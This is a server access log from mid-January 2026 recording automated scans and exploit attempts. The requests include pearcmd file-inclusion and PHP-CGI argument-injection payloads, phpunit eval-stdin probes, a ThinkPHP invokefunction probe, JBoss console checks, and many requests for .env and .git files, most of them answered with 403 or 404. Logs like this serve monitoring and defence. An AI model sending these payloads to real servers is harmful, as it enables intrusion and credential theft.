"libredtail-http" "-" +[14/Jan/2026:20:15:41 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:41 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:15:42 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:16:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.156.128.128] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[14/Jan/2026:20:18:30 +0000] 404 - GET http 92.249.249.197 "/.git/refs/heads/" [Client 185.241.208.170] [Length 122] [Gzip 1.35] "Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1" "-" +[14/Jan/2026:20:26:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:20:27:05 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 195.178.110.246] [Length 122] [Gzip 1.35] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.81 Mobile/15E148 Safari/605.1" "-" +[14/Jan/2026:20:27:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 95.214.55.71] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[14/Jan/2026:20:34:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:20:51:59 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:20:52:34 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 169.148.69.60] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:20:52:34 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 169.148.69.60] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:20:52:34 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:34 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 169.148.69.60] [Length 154] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:34 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:34 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:35 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:35 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:35 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:35 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:35 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:36 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:36 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:36 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:36 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:36 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:37 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:37 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:37 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:37 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:38 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:38 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:38 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:38 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:38 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:39 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:39 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:39 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:39 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:39 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:40 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:40 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:40 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:40 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:40 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:40 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:40 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:41 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:41 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:41 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:41 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:42 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:42 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:42 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:42 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:20:52:43 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 169.148.69.60] [Length 150] [Gzip -] "libredtail-http" "-" +[14/Jan/2026:21:04:05 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)" "-" +[14/Jan/2026:21:05:01 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:21:18:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:21:19:03 +0000] 400 - - http localhost "-" [Client 210.176.44.217] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:21:20:35 +0000] 404 - GET http 92.249.249.197 "/index.asp" [Client 204.76.203.20] [Length 122] [Gzip 1.35] "Hello World/1.0" "-" +[14/Jan/2026:21:23:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:21:27:41 +0000] 404 - HEAD http 92.249.249.197 "/invoker/EJBInvokerServlet" [Client 72.167.44.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" "-" +[14/Jan/2026:21:27:42 +0000] 404 - HEAD http 92.249.249.197 "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" [Client 72.167.44.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" "-" +[14/Jan/2026:21:27:44 +0000] 404 - HEAD http 92.249.249.197 "/invoker/JMXInvokerServlet" [Client 72.167.44.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" "-" +[14/Jan/2026:21:27:44 +0000] 404 - HEAD http 92.249.249.197 "/web-console/ServerInfo.jsp" [Client 72.167.44.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0" "-" +[14/Jan/2026:21:40:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:21:44:38 +0000] 400 - GET http 92.249.249.197 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[14/Jan/2026:21:44:38 +0000] 400 - GET http 92.249.249.197 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[14/Jan/2026:21:58:19 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:22:00:26 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 205.210.31.70] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[14/Jan/2026:22:06:45 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:22:07:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:22:16:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:22:22:50 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[14/Jan/2026:22:32:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:22:32:38 +0000] 404 - GET http 92.249.249.197 "/vgbh" [Client 195.3.222.78] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[14/Jan/2026:22:35:36 +0000] 404 - GET http 92.249.249.197 "/portal/redlion" [Client 20.163.15.97] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[14/Jan/2026:22:36:36 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:22:44:00 +0000] 400 - GET http 92.249.249.197 "/" [Client 109.196.101.80] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0" "-" +[14/Jan/2026:22:44:00 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 109.196.101.80] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0" "http://92.249.249.197:443/" +[14/Jan/2026:22:44:29 +0000] 404 - GET http 92.249.249.197 "/index.asp" [Client 204.76.203.20] [Length 122] [Gzip 1.35] "Hello World/1.0" "-" +[14/Jan/2026:22:45:42 +0000] 400 - - http localhost "-" [Client 20.80.105.157] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:22:47:15 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:22:57:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:23:02:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 202.74.0.81] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[14/Jan/2026:23:10:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:23:23:44 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:23:25:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 152.42.139.19] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" "-" +[14/Jan/2026:23:25:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 152.42.139.19] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:23:26:12 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 104.152.52.114] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:23:26:12 +0000] 400 - GET http 92.249.249.197 "/" [Client 104.152.52.102] [Length 252] [Gzip -] "curl/7.61.1" "-" +[14/Jan/2026:23:26:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 104.152.52.113] [Length 1033] [Gzip -] "curl/7.61.1" "-" +[14/Jan/2026:23:26:12 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 104.152.52.102] [Length 252] [Gzip -] "curl/7.61.1" "-" +[14/Jan/2026:23:26:13 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[14/Jan/2026:23:33:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.194.92.18] [Length 1033] [Gzip -] "-" "-" +[14/Jan/2026:23:33:10 +0000] 404 - GET http 92.249.249.197 "/index.htm" [Client 45.194.92.18] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[14/Jan/2026:23:33:10 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:23:34:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.194.92.18] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:23:35:18 +0000] 404 - GET http 92.249.249.197 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[14/Jan/2026:23:47:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[14/Jan/2026:23:55:59 +0000] 400 - GET http 92.249.249.197 "/" [Client 66.132.153.120] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:23:56:00 +0000] 400 - - http localhost "-" [Client 66.132.153.120] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:23:56:12 +0000] 400 - GET http 92.249.249.197 "/" [Client 167.94.138.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:23:56:17 +0000] 400 - - http localhost "-" [Client 167.94.138.56] [Length 154] [Gzip -] "-" "-" +[14/Jan/2026:23:56:23 +0000] 404 - GET http 92.249.249.197 "/vgbh" [Client 195.3.222.78] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136." "-" +[14/Jan/2026:23:56:48 +0000] 400 - GET http 92.249.249.197 "/.well-known/security.txt" [Client 66.132.153.120] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[14/Jan/2026:23:57:41 +0000] 400 - GET http 92.249.249.197 "/" [Client 92.63.197.50] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36" "-" +[14/Jan/2026:23:58:18 +0000] 400 - GET http 92.249.249.197 "/security.txt" [Client 167.94.138.56] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[15/Jan/2026:00:03:09 +0000] 404 - GET http 92.249.249.197 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:00:06:26 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:00:07:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:00:07:30 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.3 Safari/532.0" "-" +[15/Jan/2026:00:07:30 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.0; en-us;) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 (Kobo Touch)" "-" +[15/Jan/2026:00:07:30 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; fr-fr) AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1" "-" +[15/Jan/2026:00:07:31 +0000] 404 - GET http 92.249.249.197 "/app/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)" "-" +[15/Jan/2026:00:07:31 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" +[15/Jan/2026:00:07:31 +0000] 404 - GET http 92.249.249.197 "/demo/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.8.0.4) Gecko/20060628 Firefox/1.5.0.4" "-" +[15/Jan/2026:00:07:32 +0000] 404 - GET http 92.249.249.197 "/dev/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3,gzip(gfe)" "-" +[15/Jan/2026:00:07:32 +0000] 404 - GET http 92.249.249.197 "/staging/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; it-it) AppleWebKit/523.10.6 (KHTML, like Gecko) Version/3.0.4 Safari/523.10.6" "-" +[15/Jan/2026:00:07:32 +0000] 404 - GET http 92.249.249.197 "/mail/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.60 Safari/537.1" "-" +[15/Jan/2026:00:07:32 +0000] 404 - GET http 92.249.249.197 "/m/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5" "-" +[15/Jan/2026:00:07:32 +0000] 404 - GET http 92.249.249.197 "/remote/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11) Sprint:PPC6800" "-" +[15/Jan/2026:00:07:32 +0000] 404 - GET http 92.249.249.197 "/webmail/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.5) Gecko/20060806 Firefox/1.5.0.5" "-" +[15/Jan/2026:00:07:33 +0000] 404 - GET http 92.249.249.197 "/server/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) FxiOS/7.5b3349 Mobile/14F89 Safari/603.2.4" "-" +[15/Jan/2026:00:07:33 +0000] 404 - GET http 92.249.249.197 "/vpn/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.32 (KHTML, like Gecko) Version/10.0 Mobile/14A5261v Safari/602.1" "-" +[15/Jan/2026:00:07:33 +0000] 404 - GET http 92.249.249.197 "/secure/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; 